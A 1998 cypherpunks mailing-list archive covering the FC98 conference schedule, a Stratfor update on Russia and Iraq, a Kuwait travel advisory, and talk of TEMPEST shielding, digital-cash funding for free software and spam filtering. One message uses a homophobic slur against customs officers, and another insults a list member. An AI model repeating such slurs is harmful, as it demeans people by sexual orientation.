    Boarding: Ecliptic Curve Cruise [ECC]
         Sponsored by
            RSA
            C2NET
            Sicherheit und Privat- International Bank
            Hansa Bank
            Offshore Information Services
            Shipwright/e$

 825 *SHARP!* (ECC) (CON)
     ECC "Before" Group Photo (Net.Nyms Disguised)

 830 *SHARP!* (ECC) (CON)
     Ecliptic Curve Cruise
     Departs For the Ecliptic Curve
     and the Zone of Totality


 900 --  1030 (Anguilla) (CON)
    Breakfast at InterIsland


 1230 -- 1330 (Anguilla) (CON)
    Lunch at InterIsland

 1435? (Anguilla) (CON)
      Maximum Partial Eclipse

 1436 (ECC) (CON)
     ECC now at 16.57N, 62.15W
     (2 minute totality line,
      9 miles north of Montserrat)
     Total Eclipse of the Sun, Maximum Totality
     "Diamond ring", the stars, and all...

 2030 (ECC) (CON)
    Ecliptic Cryptography Cruise Returns to Anguilla
    ECC "After" Group Photo (Net.Nyms Disguised)



Friday 27 February 1998

 1000 --  1030 (CON)
    Breakfast

 1030 --  1230 (CE)
    Roundtable Discussion
    Financial Intermediaries, Public Networks, and Financial Cryptography
    Steve Schear, First Ecache, moderator
    Paul Guthrie, VISA International
    Frank Trotter, Mercantile Bank/Mark Twain Ecash
    A. S. von Bernhardi, Sicherheit und Privat- International Bank
    Lynwood Bell, Hansa Bank
    Other Financial Intermediaries, TBA

 1230 -- 1330 (CON)
    Lunch

 1330 -- 1430 (CE)
    Roundtable Discussion
    The Regulation of Financial Cryptography
    Duncan Frissell, Frissell Associates, Moderator
    Kevin Manson, US Dept of Treasury, Financial Fraud Institute
    A. S. von Bernhardi, Sicherheit und Privat- International Bank
    Other Regulators, Lawyers, TBA

 1430 -- 1655 (CE)
   Financial Cryptography Showcase
   Dave Del Torto/Dr. Jon Callas, PGP Certserver, banking applications
   Dr. Nicko van Someren, ncipher SET processing engine
   Stephan Overbeek,  QC N-Count
   Ian Grigg/Gary Howland, Systemics, TBA
   Other FC Products, TBA

 1655 -- 1700 (CE)
   FC98 Commercial Exhibition Closing
   Minor Exausted Hoopla
   Commercial Exhibition Survivors Group Photo (Net.Nyms Disguised)


1830 -- ? (CE)
   2nd meeting: Anguilla Dining Cryptographers' Society (at Serenity)
   Partially sponsored by C2NET


-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 11 Feb 1998 13:19:46 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Test [No Reply]
Message-ID: <199802110525.XAA00742@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Loop Test

[No Reply]


    ____________________________________________________________________
   |                                                                    |
   |                   The obvious is sometimes false;                  |
   |                   The unexpected sometimes true.                   |
   |                                                                    |
   |                                       Anonymous                    |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "WebWarrior3@InfoWar.Com" <WebWarrior3@InfoWar.Com>
Date: Wed, 11 Feb 1998 13:34:11 +0800
To: cypherpunks <cypherpunks@sirius.infonex.com>
Subject: [Fwd: Russia/Iraq]
Message-ID: <34E129F0.AE8D3EA4@InfoWar.Com>
MIME-Version: 1.0
Content-Type: text/plain

A bit off of our regularly scheduled program, but with Yeltsin saying
that Clinton might be starting a 3rd World War last week, I thought I
would pass this on.


To: webwarrior3@infowar.com
Subject: Russia/Iraq
From: alert@stratfor.com
Date: Tue, 10 Feb 1998 19:59:26 -0600 (CST)

______________________________________

Check out our newest product: Santizer
Give away your computer, not your data
______________________________________



Global Intelligence Update 
Red Alert 
February 11, 1998

Russia Threatens to Arm Baghdad
But will Saddam Remain in Power?

According to a report on Tuesday in the online edition of the Egyptian
newspaper Al-sha'b, the Russian government has warned Washington that
Russia will supply arms and humanitarian aid to Iraq if the United States
chooses to abandon diplomatic efforts and attacks Iraq.  Al-Sha'b reported
that Baghdad requested 20 billion dollars in urgent military and
humanitarian aid from Russia.  Baghdad, which already owes Russia 80
billion dollars, hopes to be able to pay off its debt once sanctions are
lifted.  Al-Sha'b went on to report that Washington has monitored
heightened states of alert and increased military preparedness throughout
the Middle East, and has warned neighboring Arab states against providing
Iraq with military support.

If the Egyptian report is factual, then Russia has just moved even closer
to confrontation with the United States.  Its previous threats of world war
are clearly not credible.  Sending aid to Iraq is, on the other hand, quite
credible and therefore is in many ways more dangerous.  The question is,
will Hussein be there after the U.S. attack to receive the arms?

We have noticed a curious juxtaposition of official U.S. statements on the
crisis in Iraq with the emerging balance of U.S. forces in the region,
suggesting that Washington may be expecting an Iraqi coup d'etat.  U.S.
Secretary of State Madeleine Albright testified before the Senate on
Tuesday that, in the event U.S. air strikes contributed to toppling Saddam
Hussein, "it would create a situation which, for a time, would require the
presence of troops."  The United States has accelerated its deployment of
ground troops to the region.  Three thousand troops from Ft. Stewart are
being deployed to reinforce the 1,500 U.S. ground troops already in Kuwait.
The USS Tarawa and the USS Guam, amphibious assault ships each carrying a
2,000-man Marine Expeditionary Unit, are headed for the Persian Gulf.
Other U.S. ground forces in the region include 6,000 soldiers at the Prince
Sultan Air Base in Saudi Arabia and 10,000 soldiers engaged in military
exercises in Egypt.

Additionally, the list of potential U.S. targets has grown from suspected
chemical and biological agent sites to include command and control
installations, the Iraqi air force, and the Republican Guard.  This
suggests a decapitation strike, aimed at disrupting Hussein's capability to
coordinate a defense of his hold on power.

Iraqi opposition forces also appear to be preparing for an altered post-air
strike environment.  The rival Kurdish Democratic Party and Patriotic Union
of Kurdestan are planning a meeting on February 12 to settle outstanding
differences and stabilize their cease-fire.  Iraqi Kurdestan's Conservative
Party public relations officer, Aram Muhammad Sa'id, declared in an
interview on Monday with the Iranian News Agency that Turkey's latest entry
into northern Iraq had the "green light" from the United States, and was
part of a U.S. plan to use air strikes to topple Hussein and dismember
Iraq.  Finally, the Iraqi National Congress has reported that Baath Party
and military officials have begun evacuating southern Iraq, lest an
uprising follow U.S. air strikes.

Many in the U.S. Congress have asserted the need for an "end game" that
removes Saddam Hussein from power, but thus far the U.S. has been unable to
foment or coordinate an overthrow of Hussein.  If it is to be successful,
we will not know for certain about a coup plot's existence until it is
underway.  But circumstances do hint that something may be in the works.
Baghdad has evidently noticed this, as Iraqi Foreign Minister Saeed al-
Sahhaf asserted on Tuesday that the U.S. would fail to topple the Iraqi
regime, since Hussein had the support of the Iraqi people.

The question is this: is there a real possibility of a coup in Baghdad or
is this part of U.S. psychological warfare against Iraq?  In a way, the
possibility of a coup is more reasonable an explanation for U.S. behavior
than the idea that the U.S. is going to mount an air campaign against
chemical and biological weapons.  What is not clear is whether a coup has a
real chance or whether this is just wishful thinking on the part of the
United States.  And it is not clear what Russia would do if the coup turned
into a protracted internal struggle.


___________________________________________________

To receive free daily Global Intelligence Updates 
or Computer Security Alerts, sign up on the web at 
http://www.stratfor.com/mail/, or send your name, 
organization, position, mailing address, phone 
number, and e-mail address to info@stratfor.com 
___________________________________________________

STRATFOR Systems, Inc. 
3301 Northland Drive, Suite 500 
Austin, TX 78731-4939
Phone: 512-454-3626 
Fax: 512-454-1614 
Internet: http://www.stratfor.com/ 
Email: info@stratfor.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Miller <dm0@avana.net>
Date: Wed, 11 Feb 1998 13:07:36 +0800
To: cypherpunks@Algebra.COM
Subject: Someone find Jim Choate a job!
Message-ID: <34E12FF3.1D6FC5DB@avana.net>
MIME-Version: 1.0
Content-Type: text/plain



Sensory deprivation has caused Mr.Choate to finally go haywire.

I suggest that someone from the state of TX (who have IDs from
Hell) transport him to the nearest University.

--David Miller

middle  rival
devil rim lad





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Wed, 11 Feb 1998 16:38:17 +0800
To: cypherpunks@Algebra.COM
Subject: Anguilla and Ricochet
Message-ID: <3.0.2.32.19980211003056.0075df9c@netcom10.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Folks,
I would like to coordinate the wireless communication efforts for FC'98 in
Anguilla. If you were there last year, you know that the lack of a
meaningful communication infrastructure is the number one problem on the
island.

If you intend to bring, or have access to, wireless modems [Ricochet],
satellite ground stations [VSAT, INMARSAT], or the like, please get in
touch with me immediately.

Thanks,


-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred

   "I do believe that where there is a choice only between cowardice and
    violence, I would advise violence." Mahatma Gandhi





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@mit.edu>
Date: Wed, 11 Feb 1998 14:26:18 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: TEMPEST open-source definition version 0.1alpha (fwd)
Message-ID: <tw7hg66vf0p.fsf@the-great-machine.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



> confusing TEMPEST with NEMA

No, I am certain they're TEMPEST cases; they're government security vendors,
with names that include the word TEMPEST or Security or whatever, and their
prices are huge.  And when I said "I'd like to pay COD", they said "we only
accept government purchase forms."  I have a plain NEMA 19" rack with power
and fans, it's quite different.

Black Unicorn's post about the demise of cash is particularly true when dealing
with vendors who want government POs :)

The people at hacking cons who are selling TEMPEST cases are selling what
I believe are the real thing acquired through a variety of methods, some
legal, others perhaps not.  Usually they contain crufty old PCs, but one
guy had some really nice fully-enclosed TEMPEST-compliant racks.  They had
serious power filters at the bottom, massive fans, and shielded fan i/o.
They were basically free (a few hundred dollars), but I couldn't motor freight
them from the location to my home, since I didn't have anything but cash at
the time.

ObNonCrypto: Waiting until 10 days before fc98 to buy airline tickets when
the cheap fare expired an hour ago was SO SO SO stupid.  Like taking 4 c-notes
and lighting them on fire.  Oh well.
-- 
Ryan Lackey
rdl@mit.edu
http://mit.edu/rdl/		





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 11 Feb 1998 09:37:20 +0800
To: cypherpunks@cyberpass.net
Subject: Godwin, et al, a pity, this
Message-ID: <199802110133.CAA10366@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Who are the "digerati" and why are they "the
cyber elite"? They are the doers, thinkers, and
writers who have tremendous influence on the
emerging communication revolution. They are
not on the frontier, they are the frontier.

The digerati evangelize, connect people, adapt quickly.
They like to talk with their peers because it forces them
to go to the top of their form and explain their most
interesting new ideas. They give each other permission
to be great. That's who they want to talk to about the
things they are excited about because they want to see if
it plays. They ask each other the questions they are
asking themselves, and that's part of what makes this
cyber elite work.


                           The Connector 
                               < John Brockman>
                           The Pragmatist 
                               < Stewart Alsop >
                           The Coyote 
                               < John Perry Barlow >
                           The Scout 
                               < Stewart Brand >
                           The Seer 
                               < David Bunnell >
                           The Thinker 
                               < Doug Carlston >
                           The Idealist 
                               < Denise Caruso >
                           The Statesman 
                               < Steve Case >
                           The Physicist 
                               < Greg Clark >
                           The Matchmaker 
                               < John Doerr >
                           The Gadfly 
                               < John C. Dvorak >
                           The Pattern-Recognizer 
                               < Esther Dyson >
                           The Software Developer 
                               < Bill Gates >
                           The Conservative 
                               < David Gelernter >
                           The Defender 
                               < Mike Godwin >
                           The Genius 
                               < W. Daniel Hillis >
                           The Judge 
                               < David R. Johnson >
                           The Searcher 
                               < Brewster Kahle >
                           The Saint 
                               < Kevin Kelly >
                           The Prodigy 
                               < Jaron Lanier >

                                                The Marketer 
                                                    < Ted Leonsis >
                                                The Scribe 
                                                    < John Markoff >
                                                The Maestro 
                                                    < Stewart McBride>
                                                The Force 
                                                    < John McCrea >
                                                The Competitor 
                                                    < Scott McNealy >
                                                The Publisher 
                                                    < Jane Metcalfe >
                                                The Pilgrim 
                                                    < Jerry Michalski >
                                                The Chef 
                                                    < Nathan Myhrvold>
                                                The Webmaster 
                                                    < Kip Parent >
                                                The Citizen 
                                                    < Howard Rheingold >
                                                The Buccaneer 
                                                    < Louis Rossetto >
                                                The Curator 
                                                    < Doug Rowan >
                                                The Oracle 
                                                    < Paul Saffo >
                                                The Radical 
                                                    < Bob Stein >
                                                The Skeptic 
                                                    < Cliff Stoll >
                                                The Catalyst 
                                                    < Linda Stone >
                                                The Evangelist 
                                                    < Lew Tucker >
                                                The Cyberanalyst 
                                                    < Sherry Turkle >
                                                The Lover 
                                                    < Dave Winer >
                                                The Impresario 
                                                    < Richard Saul Wurman >

http://www.edge.org/digerati/index.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zooko Journeyman <zooko@xs4all.nl>
Date: Wed, 11 Feb 1998 13:51:28 +0800
To: cypherpunks@ssz.com
Subject: Re: Deriving economic profits from writing FREE software?
Message-ID: <199802110400.FAA18217@xs2.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain



I have an idea for a model for deriving economic profits from 
writing free software.  It requires dcash (specifically,
some money that is cheaply and easily transferrable in small 
amounts).


People submit requests for changes to a "wishlist"/"bug report 
list".  Along with these requests they send dcash.  Various
mechanisms of market and/or trusted intermediary ensure that,
on the whole, the hackers who satisfy the most highly valued
wishes get the most money.  See 
 Grigg 1997
for one good idea of how such a market could operate.


We already have extensive networks of wishlists, bug tracking 
systems, and the rest of an integrated open, distributed 
software development system (e.g. Linux, Debian, many others).
Given the ability to pay (perhaps credit cards could be made to
work here?  Low cost credit card transactions?  Cybercash?),
we could start trying to add this kind of flow of cash to some
such systems.  Unfortunately, i fear that such attempts may
fail and disrupt currently working systems...


--Zooko

P.S.  Hi, y'all.  I've switched continents, contexts, CPUs,
sensitivities and perhaps more, but i'm fine.  Thanks for 
missing me.

p.p.s.  as per <a href="http://www.slashdot.org/slashdot.cgi?mode=article&artnum=685"> 
this slashdot.org article</a>, it is called "Open Software" 
from now on, not "Free Software".  Tell the kids.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Wed, 11 Feb 1998 12:50:15 +0800
To: Ryan Lackey <rdl@MIT.EDU>
Subject: Re: TEMPEST open-source definition version 0.1alpha
In-Reply-To: <199802110119.UAA04666@the-great-machine.mit.edu>
Message-ID: <Pine.BSF.3.96.980211055145.18886E-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 10 Feb 1998, Ryan Lackey wrote:
> Of course, it would probably make a lot of sense to do TEMPEST reverse 
> engineering in a country that has neither an OSA nor the ability to randomly
> classify research.  Yet another project for cypherpunks.to, Lucky?

I am currently busy with a complete GSM software implementation. Count me
out. But you are welcome  to host the pages on my box. :-)

-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.
   "Tonga? Where the hell is Tonga? They have Cypherpunks there?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 11 Feb 1998 22:25:26 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: VanEck, Noise, & Palmtops... (fwd)
Message-ID: <199802111428.IAA02962@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 10 Feb 1998 22:08:06 -0800
> From: Bill Frantz <frantz@netcom.com>
> Subject: Re: VanEck, Noise, & Palmtops...

> To defeat the integrating attacks you have described, you want to repeat
> the same noise frame after frame.  It must be loud enough to swamp the
> signal going to the display, so the output of the integration is the noise
> and not the signal.

True, but then we aren't talking about standard PC's and monitors are we...

*NO* method of eavesdropping can't be defeated.


    ____________________________________________________________________
   |                                                                    |
   |                   The obvious is sometimes false;                  |
   |                   The unexpected sometimes true.                   |
   |                                                                    |
   |                                       Anonymous                    |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 11 Feb 1998 22:49:22 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: NEW TRAVEL INFO -- Kuwait (fwd)
Message-ID: <199802111443.IAA03081@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:
>From owner-travel-advisories@stolaf.edu Wed Feb 11 04:13:44 1998
Date: Fri, 6 Feb 1998 14:37:33 -0500
From: owner-travel-advisories <owner-travel-advisories@stolaf.edu>
Subject: NEW TRAVEL INFO -- Kuwait
Sender: "U.S. Department of State" <76702.1202@compuserve.com>
To: travel-advisories@stolaf.edu
Message-ID: <199802061439_MC2-3241-E30@compuserve.com>
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Precedence: bulk

STATE DEPARTMENT TRAVEL INFORMATION - Kuwait
============================================================
Kuwait - Public Announcement
 February 6, 1998

On February 5, 1998, the American Embassy in Kuwait was authorized 
to issue the following warden message:

"We are monitoring the situation with Iraq closely.  Although we 
see no direct threat to the safety of American citizens in Kuwait at 
this time, we believe it would be prudent now for all citizens to 
heed the standing preparedness advice for American citizens living 
abroad.  Specifically, you should:

--assemble all vital documents such as passports, birth and 
marriage records, vaccination, insurance and bank records in one 
readily accessible location;

--check to be sure that your passport and any necessary visas are 
valid and that you are registered at the Embassy with your current 
address and phone number.  If you need to obtain a new passport or 
to update your registration, please do so at the Embassy as soon as 
possible, any working day from 8:30 to 11:30 am or 1:00 to 3:00 pm;

--make or update as necessary a complete inventory of your 
household effects, in duplicate;

--maintain an adequate supply of food and water in your home.  Make 
sure your car is in good working order.  Keep the gas tank full and 
check oil, coolant, tires and battery.

We do not want American citizens in Kuwait to become unduly 
alarmed.  These are precautionary measures only.  We are not 
advising Americans to leave.  However, given the potential 
seriousness of the current situation we believe it is important for 
all citizens to maintain readiness in case of an emergency.  We will 
promptly inform you of any significant developments and advise you 
accordingly."

For further information on travel to Kuwait, please consult the 
latest Consular Information Sheet for Kuwait or contact the U.S. 
Embassy in Kuwait.  This Public Announcement expires May 6, 1998.


Kuwait - Consular Information Sheet
 August 28, 1996

Country Description:  Kuwait is a constitutional monarchy with a 
modern economy.  Day-to-day life has returned to normal after the 
1991 Gulf War, and facilities for travelers are widely available.  
The workweek in Kuwait is Saturday through Wednesday.

Entry Requirements:  Passports and visas are required for U.S. 
citizens traveling to Kuwait.  For more information concerning entry 
requirements, travelers may contact the Embassy of Kuwait at 2940 
Tilden St., N.W., Washington, D.C. 20008, telephone (202) 966-0702, 
or the Kuwaiti Consulate in New York City, telephone (212) 973-4318.

Areas of Instability:  Travel to and near the Iraq-Kuwait border is 
very hazardous.  U.S. citizens having legitimate work-related 
business near the border may receive updated information from the 
U.S. Embassy, and may also wish to consult with their employer's 
security personnel.  Unexploded bombs, mines, booby traps, and other 
items remain in open areas and beaches throughout Kuwait.  U.S. 
Embassy personnel have been forbidden to travel off paved surfaces 
outside Kuwait City.

Medical Facilities:  The health care delivery system continues to 
rebuild, with many medical facilities, both government and private, 
available in Kuwait.  Medical care at government-run clinics and 
hospitals is generally provided free of charge or at low cost to 
residents of Kuwait, while private physicians and hospitals charge a 
fee for services.  Non-residents have found that private doctors, 
hospitals and clinics expect immediate cash payment for their 
services.  U.S. medical insurance is not always valid outside the 
United States.  Medevac insurance, for emergencies requiring 
treatment outside Kuwait, and supplemental medical insurance with 
specific overseas coverage have proven useful.  Additional 
information on health matters can be obtained from the Centers for 
Disease Control and Prevention's international travelers hotline, 
telephone (404) 332-4559 or visit the CDC Home Page on the Internet 
at http://www.cdc.gov.

Crime Information:  The crime rate in Kuwait is moderate.  However, 
weapons left over from the 1991 Gulf War remain in the hands of the 
populace, and shooting incidents have occurred,  Both physical and 
verbal harassment of women is a continuing problem.  The loss or 
theft of a U.S. passport abroad should be reported immediately to 
local police and the nearest U.S. embassy or consulate.  Useful 
information on safeguarding valuables, protecting personal security, 
and other matters while traveling abroad is provided in the 
Department of State pamphlets, "A Safe Trip Abroad" and "Tips for 
Travelers to the Middle East and North Africa."  They are available 
from the Superintendent of Documents, U.S. Government Printing 
Office, Washington, D.C. 20402.

Currency Regulations:  Travelers checks and credit cards are widely 
acceptable.  Kuwaiti currency is readily convertible to U.S. dollars.

Drug and Crime Penalties:  U.S. citizens are subject to the laws of 
the country in which they are traveling.  Alcohol, pork products, 
and pornography are illegal in Kuwait.  Penalties for importation, 
possession, use, manufacture or sale of illegal drugs, alcohol, or 
pornography are severe, and convicted offenders can expect jail 
sentences and fines.  Religious proselytizing is not permitted.

Terrorist Activities:  Americans in Kuwait should be alert to their 
surroundings and take prudent security precautions.  U.S. citizens 
may wish to consult the Department of State or the U.S. Embassy for 
updated information.

Child Custody:  In Kuwait, child custody decisions are based on 
Islamic law.  It is extremely difficult for an American woman, even 
a Muslim, to obtain custody of her children through a Kuwaiti court 
decision.  Regardless of their parents' marital status, minor 
children of a Kuwaiti father may not leave Kuwait without the 
father's permission.

Traffic Safety and Road Conditions:  Driving in Kuwait can be 
hazardous.  Although Kuwait has an extensive and modern system of 
well-lighted roads, excessive speeding on both primary and secondary 
roads, coupled with lax enforcement of traffic regulations, lead to 
frequent and often fatal accidents.

Embassy Location and Registration:  U.S. citizens are encouraged to 
register at the Consular Section of the U.S. Embassy and to enroll 
in the Embassy's emergency alert network, and to obtain updated 
information on travel and security in Kuwait.  The U.S. Embassy in 
Kuwait is located at Al-Masjid Al-Aqsa Street, Plot 14, Block 14, 
Bayan, Kuwait.  The mailing address is P.O. Box 77, Safat 13001, 
Kuwait; telephone (965) 242-4151 through 9.

 No. 96-150

This replaces the Consular Information Sheet for Kuwait dated 
September 20, 1994, to update information on areas of instability, 
drug and crime penalties, terrorist activities, and the address of 
the U.S. Embassy, and to add information on child custody and 
traffic safety and road conditions.

----- ----- ----- ----- ----- ----- ----- ----- ----- ----- ----- ----- -----
The "travel-advisories@stolaf.edu" mailing list is the official Internet and
BITNET distribution point for the U.S. State Department Travel Warnings and
Consular Information Sheets.  To unsubscribe, send a message containing the
word "unsubscribe" to:	travel-advisories-request@stolaf.edu

Archives of past "travel-advisories" postings are available at the URL:
"http://www.stolaf.edu/network/travel-advisories.html" or via Gopher:
gopher.stolaf.edu, Internet Resources/US-State-Department-Travel-Advisories





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Wed, 11 Feb 1998 15:54:53 +0800
To: Ryan Lackey <rdl@MIT.EDU>
Subject: Re: TEMPEST open-source definition version 0.1alpha (fwd)
In-Reply-To: <tw7hg66vf0p.fsf@the-great-machine.mit.edu>
Message-ID: <Pine.BSF.3.96.980211085421.19149A-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



On 11 Feb 1998, Ryan Lackey wrote:
> ObNonCrypto: Waiting until 10 days before fc98 to buy airline tickets when
> the cheap fare expired an hour ago was SO SO SO stupid.  Like taking 4 c-notes
> and lighting them on fire.  Oh well.

Ouch. Guess you learned that one the hard way. See you all in Anguilla.
Remember, bring a US analog cellphone and export versions of Ricochet
modems. Also any and all satelite ground station equippment you might have
access to. Yes, that does mean your INMARSAT phones.

-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.
   "Tonga? Where the hell is Tonga? They have Cypherpunks there?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sunder <sunder@brainlink.com>
Date: Wed, 11 Feb 1998 23:30:05 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: FCPUNX:time to learn chinese?
In-Reply-To: <199802102142.NAA10766@proxy3.ba.best.com>
Message-ID: <34E1BF13.E43A04E9@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



James A. Donald wrote:

> In other words, instead of China taking over Hong Kong, Hong
> Kong takes over China.

A good friend of mine had the same idea in terms of Microsoft and Apple when
Bill gave Steve "Reality Distortion Field" Jobs lots of money.  His thought was
that Microsoft thought they bought Apple off.  What had really happend was that
OpenStep took over Apple (it did via Rhapsody) and that since (he believes)
that
it will be ported to NT and become part of NT later, it is really Jobs's way of 
taking over EvilSoft.

IMHO, I wouldn't mind if OpenStep penetrated NT.  It would certainly be an
upgrade
in my book. :)  Then again with the way EvilSoft worked in the past, it may
corrupt
both.

:)  We'll see I suppose.  But capitatism is indeed a good virus (one would
hope a strong enough one to topple the last of the big huge communist blocks.)
:) 

-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul Bradley" <csm70830@port.ac.uk>
Date: Wed, 11 Feb 1998 20:49:52 +0800
To: tcmay@got.net
Subject: RE: Cyber 'Nannys"
In-Reply-To: <34DF87FE.611AA4EF@InfoWar.Com>
Message-ID: <18B66325A0@ou20.csm.port.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain




> >While I do not disagree that these companies should be able to market
> >their products, I wholeheartedly disagree with the fact that often their
> >customers (the adults who bought the software or subscribed to he
> >'service') are not allowed to have a list of what is actually blocked,
> 
> So you wholeheartedly disagree that they are not giving you a list of what
> is blocked...so go use another service.


I second that, it is strange how easily it is to bait supposedly 
libertarian list members into saying statist things about "consumer 
protection laws" and other such examples of state force and coercion 
over businesses. 

I do not go out, but a piece of software, then "demand" that I am 
given the source code and an explanation of why each line was written 
in the particular way it appears, of course this is all an aside to 
the real point that people should know better than to try to 
"protect" children from speech they don`t like.


--                  
                            Paul Bradley 
                      paul@fatmans.demon.co.uk
       "Why should anyone want to live on rails?" - Stephen Fry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sparkes, Ian, ZFRD AC" <ian.sparkes@17.dmst02.telekom400.dbp.de>
Date: Wed, 11 Feb 1998 22:07:15 +0800
To: cypherpunks@ssz.com
Subject: Legality of *non*-encryption
Message-ID: <000001b0000000c4*/c=de/admd=dbp/prmd=telekom400/o=dmst02/ou=17/s=sparkes/g=ian/@MHS>
MIME-Version: 1.0
Content-Type: text/plain



I heard an interesting new slant on the legality of 
encryption today.

I was talking to a colleague who is employed in a law firm 
here in Germany. It appears that under the current 
interpretation of German law, communications of a 
confidential nature (for example, contracts, medical 
records and so forth) over an insecure network *MUST* be 
encrypted to protect the Client. It is therefore a breach 
of German law to send unencypted eMail, unless it can be 
proved that every stage of the transmission happens over 
internal (secure?) paths.

I will dig further on this - perhaps there is a useful 
precedent to be established here. At very least we might be 
able to keep lawers (and doctors) off the net ;-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Bradley <paul@fatmans.demon.co.uk>
Date: Thu, 19 Feb 1998 23:39:54 +0800
To: Ken Williams <jkwilli2@unity.ncsu.edu>
Subject: Re: Letter of the law
In-Reply-To: <Pine.SOL.3.96.980217135102.29424A-100000@c00954-100lez.eos.ncsu.edu>
Message-ID: <Pine.LNX.3.91.980217191945.202A-100000@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain




> the only relevant question here regards the odds that a US Customs officer
> is going to want you to drop your drawers and bend over...

Reasonably good odds I would say given the reputation of Customs-faggots...

        Datacomms Technologies data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: FC76DA85
     "Don`t forget to mount a scratch monkey"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvdi.net>
Date: Thu, 19 Feb 1998 01:31:40 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Dealing with Spam, Part 2
In-Reply-To: <v03102806b10fa676e128@[207.167.93.63]>
Message-ID: <v03102802b1103e72dfb4@[24.234.31.57]>
MIME-Version: 1.0
Content-Type: text/enriched

 >>MailGuard, which can be downloaded from www.fundi.com, interposes itself
>>between your existing email package and the Internet. When a piece of mail
>>comes in, it checks to see whether it recognizes the address of the sender.
>>If not, it issues a carefully drafted challenge, asking the sender politely
>>to confirm that he is not a bulk sender of commercial mail by replying with
>>a specified phrase in the subject field of the email.

